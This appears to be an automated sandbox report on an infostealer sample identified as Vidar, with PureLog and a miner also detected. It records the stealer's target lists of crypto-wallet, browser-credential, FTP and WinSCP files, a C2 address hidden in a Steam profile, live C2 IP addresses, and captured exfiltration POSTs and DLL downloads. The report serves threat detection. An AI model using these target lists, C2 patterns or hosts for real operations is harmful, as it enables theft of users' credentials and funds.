Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000003.00000002.2042222099.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 9.0.CAFIJKFHIJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\CAFIJKFHIJ.exe, type: DROPPED

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe PID: 6016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C9E0C40 sqlite3_bind_zeroblob,	3_2_6C9E0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C9E0D60 sqlite3_bind_parameter_name,	3_2_6C9E0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C908EA0 sqlite3_clear_bindings,	3_2_6C908EA0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
65.109.242.73	unknown	United States	11022	ALABANZA-BALTUS	false
162.19.138.79	centrosmissextensions.com	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
23.76.43.59	steamcommunity.com	United States	19037	AMXArgentinaSAAR	false

Contacted Domains

Name	IP	Active
steamcommunity.com	23.76.43.59	true
centrosmissextensions.com	162.19.138.79	true

Contacted URLs

Name	Malicious	Reputation
https://65.109.242.73/mozglue.dll	false	unknown
https://65.109.242.73/	false	unknown
https://65.109.242.73/sqln.dll	false	unknown
https://65.109.242.73/freebl3.dll	false	unknown
https://65.109.242.73/msvcp140.dll	false	unknown
https://65.109.242.73/vcruntime140.dll	false	unknown
https://65.109.242.73/nss3.dll	false	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\CAFIJKFHIJ.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe	ReversingLabs: Detection: 66%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: C:\ProgramData\CAFIJKFHIJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411720 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	3_2_00411720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406FD0 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_00406FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409230 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,	3_2_00409230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406F50 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00406F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C806C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6C806C80

Bitcoin Miner

Yara detected Phonk Miner

Source: Yara match	File source: 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CAFIJKFHIJ.exe PID: 5744, type: MEMORYSTR

Uses 32bit PE files

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.76.43.59:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.73:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.19.138.79:443 -> 192.168.2.4:49754 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdbSHA256@ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb\ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdbH source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdbSHA256$ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdbSHA256 source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6A7B3 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00F6A7B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040B030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_004011E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	3_2_004164A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00417550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00416CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	3_2_00417140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A980

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

3_2_004168E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199673019888

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.19.138.79 162.19.138.79
Source: Joe Sandbox View	IP Address: 23.76.43.59 23.76.43.59

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 7661Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
